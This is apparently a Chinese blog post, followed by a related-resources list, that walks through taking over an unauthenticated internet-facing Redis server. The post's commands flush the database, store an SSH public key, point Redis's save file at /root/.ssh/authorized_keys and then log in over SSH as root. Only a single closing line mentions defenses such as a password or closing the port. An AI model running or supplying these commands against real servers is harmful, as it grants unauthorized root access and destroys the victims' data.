`

redis攻击

 
阅读更多
redis 6379 如果对外 开放。。
如果 没设置密码

攻击步骤如下 

cd /root
ssh-keygen -t rsa
echo -e "\n\n" > testx.pub 
#生成用于登录的公钥
cat /root/.ssh/id_rsa.pub >> testx.pub
echo -e "\n\n" >> testx.pub
#登录上去弄空redis数据库
./redis-cli -h xxx.xxx.xxx.xxx
flushall
#设置一个随便的公钥key
cat /root/testx.pub | ./redis-cli -h xxx.xx.xx.xxx -p 6379 -x set testx
# 最后一步 修改redis配置
config set dir /root/.ssh
config set dbfilename authorized_keys
#   保存
save


然后就能直接 ssh  登录  服务器了



预防措施有增加密码、关闭外网端口等
分享到:
| MAC配置MySQL my.cnf配置文件
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

    redis攻击还原

    文档中提到的Redis攻击还原,涵盖了攻击者如何利用Redis服务发起攻击以及如何进行防御。 首先,文档指出Redis攻击的原理之一在于其默认配置并不安全,特别在未设置密码认证的情况下,任何知道Redis服务所在IP和端口...

    redis面试题及其答案.pdf

    Redis是一个高性能的开源内存数据库,广泛应用于各种需要高速读写的场合,如缓存、消息队列处理、数据的临时存储等场景。本内容将详细介绍Redis的主要功能、数据类型、单进程单线程设计、优势、数据淘汰策略以及集群...

    Redis - Redis深度历险.pdf.zip

    12. **命令监控与限制**:Redis提供了`INFO`命令获取服务器状态,以及`CLIENT KILL`等命令限制客户端行为,以防止DoS攻击。 通过深入学习《Redis深度历险》,读者可以掌握如何高效利用Redis的特性来解决实际问题,...

    Linux下安装配置redis详细教程,并配置哨兵模式,redis中文详解

    注意:对只使用redis服务,只需要在主Redis里面配置requirepass,在从Redis里面配置masterauth,密码保持一致,密码尽可能复杂,以免被攻击破解。 注意:对只使用redis服务,如果从Redis也有必要加入访问验证,也...

    redis-6.2.13.tar.gz

    可以通过`rename-command`更改敏感命令名称,防止误操作或攻击。还可以设置密码保护,限制客户端连接。 10. **模块系统**: Redis 6.2.13引入了模块系统,允许扩展其功能,如GEO索引、TTL监控等。 11. **性能...

    redis客户端,连接查看redis数据库

    - **命令限制**:客户端可以根据需求限制可执行的命令,防止误操作或恶意攻击。 7. **监控与日志** - **INFO命令**:获取Redis服务器状态信息,包括内存、CPU、连接数等。 - **慢查询日志**:记录执行时间过长的...

    redis Windows安装版

    10. **安全注意事项**:由于Redis默认配置下不安全,容易遭受攻击,因此在生产环境中,建议启用密码认证、限制客户端连接、禁用不必要的命令等安全措施。 以上就是Windows上安装Redis 3.2.100的详细步骤和相关知识...

    redis-6.2.5.rar

    3. 安全性提升:可能包含安全修复和强化,以防止潜在的攻击。 4. 支持多线程:从Redis 6开始,引入了多线程模型,提高了处理网络I/O的能力,尤其是在高并发场景下。 5. 模块系统增强:允许开发者扩展Redis的功能,...

    redis-desktop-manager-0.9.3.817

    8. **安全性**:通过加密连接保障数据传输的安全,防止中间人攻击。 9. **更新日志和文档**:通常,readme.txt文件会包含软件的更新日志、使用说明和常见问题解答,帮助用户了解新版本的改进和解决可能遇到的问题。...

    redis-3.0.5.tar.gz和redis-3.2.13.tar.gz两个版本的redis

    默认开启的保护模式使得新用户更不容易犯下配置错误,从而降低系统被攻击的可能性。当然,用户仍然可以根据需要手动禁用或调整这个模式,但这种默认设置无疑提高了整体的安全基线。 在从3.0.5升级到3.2.13的过程中...

    redis-server:5.0.14.1 windows版本

    8. **命令限制和过期策略**: Redis允许设置命令执行的频率限制以及键的过期时间,以防止恶意攻击或无效数据占用内存。 在Windows环境下使用Redis,需要注意以下几点: 1. **兼容性**: 确保你的Windows版本与Redis...

    win-redis6压缩包 解压即用

    3. **lua脚本安全增强**:Lua 脚本执行环境进行了安全强化,可以更好地防止潜在的安全问题,例如通过脚本注入攻击。 4. **客户端缓存**:新增了客户端缓存机制,允许客户端缓存服务器响应,减少不必要的网络通信,...

    redis-2.8.9.rar

    此外,为了保证服务的稳定性和安全性,还需要关注Redis的配置优化、内存管理策略以及安全性设置,例如防止Redis被恶意攻击。 在压缩包"redis-2.8.9"中,包含的是Redis 2.8.9版本的源码和相关文件。这个版本可能已经...

    Redis缓存技术安装包文件.rar

    7. 安全性:讨论如何保护Redis免受攻击,例如设置访问密码、限制客户端连接来源等。 8. 实际应用案例:分享一些实际项目中使用Redis的案例,帮助理解其在缓存、计数器、队列等场景下的应用。 以上是对Redis安装和...

    redis安装包和网址.rar

    同时,注意不要将Redis直接暴露在公网,以免遭受攻击。 12. **工具集成**:Redis有许多第三方工具,如可视化管理工具RedisInsight、监控工具Redmon、性能测试工具redis-benchmark等,这些工具可以帮助管理和优化...

    java+redis+lua实现重复提交操作拦截.zip

    本项目"java+redis+lua实现重复提交操作拦截"旨在解决这个问题,通过结合Java、Redis和Lua技术来构建一个高效的解决方案。以下是相关知识点的详细说明: 1. **Java AOP(面向切面编程)**: - AOP是一种编程范式,...

    Python-通过Redis和CSRF获取RCE的一个示例

    1. **未授权访问**:默认情况下,Redis服务器可能允许任何网络连接,如果没有设置密码或限制访问,攻击者可以轻易地连接并操作Redis数据库。 2. **命令注入**:由于Redis支持通过客户端发送命令,如果应用程序没有...

    redis windows 7 64位安装包

    Redis默认只允许本地连接,为了防止远程攻击,不要轻易更改`bind`配置以允许所有IP访问。如果确实需要远程访问,应确保配置了正确的防火墙规则,并启用认证机制,如`requirepass`密码保护。 7. **Redis数据持久化*...

    Go-ratelimit使用Redis来Ratelimit限制你的方法

    总结来说,通过结合Go语言和Redis,我们可以有效地实现ratelimit功能,保护我们的服务免受高并发或恶意攻击的影响。同时,Redis的高效率和灵活性使其成为实现这种功能的理想工具。记得在实际应用中,根据项目需求...

Magicbox
Global site tag (gtag.js) - Google Analytics